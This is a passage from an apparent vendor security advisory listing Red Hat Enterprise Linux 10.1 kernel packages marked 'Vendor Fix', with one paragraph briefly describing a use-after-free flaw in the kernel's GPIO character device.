|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
A flaw was found in the Linux kernel's GPIO (General Purpose Input/Output) character device. A local attacker with low privileges could exploit a use-after-free vulnerability. This occurs when a GPIO change event is emitted after a file descriptor's reference count has dropped to zero, but before its release callback is invoked. This could lead to privilege escalation or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
